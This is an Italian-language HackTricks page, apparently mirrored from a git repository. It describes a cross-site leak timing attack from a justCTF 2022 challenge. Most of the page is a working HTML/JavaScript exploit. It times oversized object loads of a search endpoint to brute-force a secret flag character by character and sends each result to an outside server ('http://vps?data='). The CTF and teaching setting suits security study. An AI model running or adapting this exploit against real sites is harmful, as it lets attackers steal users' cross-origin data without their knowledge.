Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2025-02-17 06:28:27 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/pentesting-web/xs-search/performance.now-+-force-heavy-task.md

133 lines
4.5 KiB
Markdown
Raw Blame History

# performance.now + Force heavy task
{% hint style="success" %}
Impara e pratica l'Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Impara e pratica l'Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Supporta HackTricks</summary>
* Controlla i [**piani di abbonamento**](https://github.com/sponsors/carlospolop)!
* **Unisciti al** 💬 [**gruppo Discord**](https://discord.gg/hRep4RUj7f) o al [**gruppo telegram**](https://t.me/peass) o **seguici** su **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Condividi trucchi di hacking inviando PR ai** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos su github.
</details>
{% endhint %}
**Exploit preso da [https://blog.huli.tw/2022/06/14/en/justctf-2022-xsleak-writeup/](https://blog.huli.tw/2022/06/14/en/justctf-2022-xsleak-writeup/)**
In questa sfida l'utente poteva inviare migliaia di caratteri e se il flag era contenuto, i caratteri venivano restituiti al bot. Quindi, inviando una grande quantità di caratteri, l'attaccante poteva misurare se il flag era contenuto nella stringa inviata o meno.
{% hint style="warning" %}
Inizialmente, non ho impostato la larghezza e l'altezza dell'oggetto, ma successivamente ho scoperto che è importante perché la dimensione predefinita è troppo piccola per fare la differenza nel tempo di caricamento.
{% endhint %}
```html
<!DOCTYPE html>
<html>
<head>
</head>
<body>
<img src="https://deelay.me/30000/https://example.com">
<script>
fetch('https://deelay.me/30000/https://example.com')
function send(data) {
fetch('http://vps?data='+encodeURIComponent(data)).catch(err => 1)
}
function leak(char, callback) {
return new Promise(resolve => {
let ss = 'just_random_string'
let url = `http://baby-xsleak-ams3.web.jctf.pro/search/?search=${char}&msg=`+ss[Math.floor(Math.random()*ss.length)].repeat(1000000)
let start = performance.now()
let object = document.createElement('object');
object.width = '2000px'
object.height = '2000px'
object.data = url;
object.onload = () => {
object.remove()
let end = performance.now()
resolve(end - start)
}
object.onerror = () => console.log('Error event triggered');
document.body.appendChild(object);
})
}
send('start')
let charset = 'abcdefghijklmnopqrstuvwxyz_}'.split('')
let flag = 'justCTF{'
async function main() {
let found = 0
let notFound = 0
for(let i=0;i<3;i++) {
await leak('..')
}
for(let i=0; i<3; i++) {
found += await leak('justCTF')
}
for(let i=0; i<3; i++) {
notFound += await leak('NOT_FOUND123')
}
found /= 3
notFound /= 3
send('found flag:'+found)
send('not found flag:'+notFound)
let threshold = found - ((found - notFound)/2)
send('threshold:'+threshold)
if (notFound > found) {
return
}
// exploit
while(true) {
if (flag[flag.length - 1] === '}') {
break
}
for(let char of charset) {
let trying = flag + char
let time = 0
for(let i=0; i<3; i++) {
time += await leak(trying)
}
time/=3
send('char:'+trying+',time:'+time)
if (time >= threshold) {
flag += char
send(flag)
break
}
}
}
}
main()
</script>
</body>
</html>
```
{% hint style="success" %}
Impara e pratica il hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Impara e pratica il hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Supporta HackTricks</summary>
* Controlla i [**piani di abbonamento**](https://github.com/sponsors/carlospolop)!
* **Unisciti al** 💬 [**gruppo Discord**](https://discord.gg/hRep4RUj7f) o al [**gruppo telegram**](https://t.me/peass) o **seguici** su **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Condividi trucchi di hacking inviando PR ai** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos su github.
</details>
{% endhint %}
Reference in a new issue View git blame Copy permalink